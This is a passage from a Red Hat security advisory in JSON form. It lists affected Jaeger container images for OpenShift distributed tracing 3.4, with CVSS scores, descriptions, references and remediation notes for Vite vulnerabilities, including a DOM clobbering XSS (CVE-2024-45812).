3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "vite: server.fs.deny is bypassed when using `?import\u0026raw`" }, { "cve": "CVE-2024-45812", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2024-09-17T20:20:07.064245+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2312935" } ], "notes": [ { "category": "description", "text": "A DOM clobbering vulnerability was found in ViteJS. This may lead to cross-site scripting (XSS) attacks on websites that include Vite-bundled files configured with an output format of cjs, iife, or umd, and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.", "title": "Vulnerability description" }, { "category": "summary", "text": "vite: XSS via DOM Clobbering gadget found in vite bundled scripts", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue is classified as moderate severity rather than important due to the specific conditions required to exploit the vulnerability. While DOM Clobbering can lead to Cross-Site Scripting (XSS), the attack surface is relatively limited. Exploitation is contingent on the presence of unsanitized user-supplied HTML with certain scriptless attributes (`name`, `id`) and the use of particular Vite build outputs (`cjs`, `iife`, `umd`). In environments following proper input sanitization practices, the risk is significantly mitigated. Moreover, the vulnerability does not enable direct code injection or compromise by default but rather leverages existing script elements, reducing the likelihood of widespread exploitation compared to higher severity issues.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45812" }, { "category": "external", "summary": "RHBZ#2312935", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312935" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45812", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45812" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45812", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45812" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad", "url": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad" }, { "category": "external", "summary": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3", "url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3" }, { "category": "external", "summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", "url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986" }, { "category": "external", "summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering", "url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering" }, { "category": "external", "summary": "https://scnps.co/papers/sp23_domclob.pdf", "url": "https://scnps.co/papers/sp23_domclob.pdf" } ], "release_date": "2024-09-17T20:15:06.037000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", 